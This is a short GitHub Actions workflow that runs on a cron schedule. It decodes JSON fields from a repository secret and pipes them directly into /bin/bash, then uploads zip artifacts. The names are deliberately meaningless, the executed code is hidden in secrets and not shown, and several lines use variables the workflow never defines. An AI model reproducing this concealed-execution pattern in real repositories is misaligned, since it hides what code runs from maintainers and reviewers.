name: feiyulishou
on:
  workflow_dispatch:

  schedule:
    - cron: '5 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: feiyulishou
        env:
          hpunh0700: ${{ secrets.hpunh0700 }}
        run: |
          printf '%s' "$hpunh0700" | jq -r .hncmb64 | /bin/bash
          printf '%s' "$pelde3" | jq -r .xujkb8 | /bin/bash
          echo $uttt6 | jq -r .hnxv4233 | /bin/bash
          echo $b592 | jq -r .jsc4 | /bin/bash
          echo $qaf268 | jq -r .dri7440 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: hhj3w3fQ
          path: "*.zip"
          retention-days: 1
